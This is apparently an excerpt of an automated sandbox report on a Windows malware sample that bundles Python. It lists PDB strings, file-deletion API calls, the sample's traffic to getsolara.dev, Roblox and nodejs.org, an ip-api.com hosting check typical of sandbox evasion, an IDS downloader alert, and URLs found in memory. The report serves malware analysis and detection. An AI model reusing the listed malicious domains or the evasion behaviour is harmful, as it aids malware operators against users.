                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1498932456.00007FF8E83BB000.00000040.00000001.01000000.00000008.sdmp
                Source: Binary string: System.Drawing.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499964052.00007FF8F8D81000.00000040.00000001.01000000.00000012.sdmp
                Source: Binary string: System.Core.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Runtime.Serialization.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1498719679.00007FF8E8371000.00000040.00000001.01000000.0000000A.sdmp
                Source: Binary string: System.Numerics.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\libssl-3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
                Source: Binary string: System.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmp
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7EAD083C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD09280 FindFirstFileExW,FindClose,0_2_00007FF7EAD09280
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD21874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7EAD21874
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD09280 FindFirstFileExW,FindClose,2_2_00007FF7EAD09280
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7EAD083C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD21874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7EAD21874
                Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
                Source: global trafficHTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Host: clientsettings.roblox.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 172.67.203.125 172.67.203.125
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: ip-api.com
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49785 -> 172.67.203.125:443
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E813660C recv,2_2_00007FF8E813660C
                Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
                Source: global trafficHTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Host: clientsettings.roblox.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
                Source: global trafficDNS traffic detected: DNS query: blank-8rmnx.in
                Source: global trafficDNS traffic detected: DNS query: getsolara.dev
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: global trafficDNS traffic detected: DNS query: clientsettings.roblox.com
                Source: global trafficDNS traffic detected: DNS query: www.nodejs.org
                Source: global trafficDNS traffic detected: DNS query: nodejs.org
                Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6463
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6B9E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6463/rpc?v=1
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6B9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:64632f
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000002.1504216075.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientsettings.roblox.com
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: powershell.exe, 0000000B.00000002.1527997670.000001E373670000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1610583580.00000254CF160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: powershell.exe, 0000000B.00000002.1534955775.000001E373933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                Source: powershell.exe, 0000000B.00000002.1534955775.000001E373933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000002.1504216075.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: _queue.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
